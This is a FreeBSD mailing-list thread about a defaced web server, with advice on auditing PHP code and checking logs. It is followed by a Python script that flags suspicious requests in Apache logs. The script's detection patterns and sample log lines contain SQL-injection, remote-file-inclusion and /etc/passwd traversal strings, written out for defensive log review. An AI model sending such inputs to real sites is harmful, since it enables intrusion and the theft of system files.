Squirrel wrote:
My server was hacked, and the hacker was nice enough to not cause
damage except changing index.php of a couple of my websites.  The
index.php had the following info:

"Hacked By Top First Warning That's Bug From Your Servers Next Time
You Must Be Careful And Fixed Your Site Before Coming Another Hacker
And Hacked You Again Sorry Admin And Don't Worry Just I Change Index ALTBTA For Contact : l...@hotmail.com Best Wishes"

I wouldn't be sure he has changed only the indexes; it's a good rule to check
carefully every other file or revert to a backup preceding the hacking.


Of course, I sent him email, just in case it's valid, asking how he
did it or how should I patch things up.  But haven't got a reply yet.
I've looked at all the log files, particularly auth.log, although
there were thousands of login attempts to SSH and FTP, but none
succeeded.  And I don't know where else to look, please help.

I'm using FreeBSD 7.1-Release with below daemons

Apache 2.2.11 ProFTP 1.32 OpenSSH 5.1 Webmin 1.480 MySQL 5.0.67 BIND 9.6.0


Most likely it could be some kind of remote code execution or SQLi executed in the
context of some PHP scripts; you should audit the PHP code of your web interface
and of the websites you host.
Also consider the strength of your passwords: lots of login attempts to SSH/FTP
may mean he has tried a brute-force (or maybe a dictionary) attack. You should
also check the Webmin logs; there are a few brute-forcers for Webmin out there.
(*hint*) Consider the length of your average password: if it's more than 7-8
characters, alphanumeric with symbols, most likely this isn't the case.

Check (if you have them) the logs of URLs requested and MySQL errors; the answer
could probably be found here.

regards
ocean
_______________________________________________
freebsd-stable@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-stable
To unsubscribe, send any mail to "freebsd-stable-unsubscr...@freebsd.org"
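
An added example, not part of the original thread: one way to review the "logs of URLs requested" mentioned in the reply, by scanning Apache access-log lines for requests that look like SQL injection, remote file inclusion or path traversal. The signature list, the sample log lines and all paths and addresses are constructed assumptions, and the sketch assumes Apache's "combined" log format.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Heuristic signatures (assumptions for illustration, not a complete rule set).
SIGNATURES = {
    "sqli": re.compile(r"(union\s+(all\s+)?select|information_schema|'\s*or\s+'?\d+'?\s*=)", re.I),
    "remote_include": re.compile(r"[?&][^=&]+=(https?|ftp)://", re.I),
    "traversal": re.compile(r"\.\./|/etc/passwd", re.I),
}

def scan(lines):
    """Return (ip, time, status, category, decoded_url) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip instead of guessing
        # Decode twice so double-encoded input (%252f -> %2f -> /) is still seen.
        url = unquote_plus(unquote_plus(m["url"]))
        for category, sig in SIGNATURES.items():
            if sig.search(url):
                hits.append((m["ip"], m["time"], int(m["status"]), category, url))
    return hits

# Constructed sample lines (documentation-range IPs, made-up script names).
SAMPLE = [
    '192.0.2.10 - - [01/Mar/2009:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Mar/2009:10:02:13 +0000] "GET /news.php?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 734 "-" "-"',
    '198.51.100.7 - - [01/Mar/2009:10:03:40 +0000] "GET /page.php?inc=http://example.invalid/x.txt HTTP/1.1" 200 90 "-" "-"',
    '203.0.113.5 - - [01/Mar/2009:10:05:02 +0000] "GET /view.php?file=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, when, status, category, url in scan(SAMPLE):
        print(f"{when} {ip} {status} {category}: {url}")
```

Hits answered with status 200 are the ones to read first, since the script accepted the request; the script name in each hit points at the PHP file to audit.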
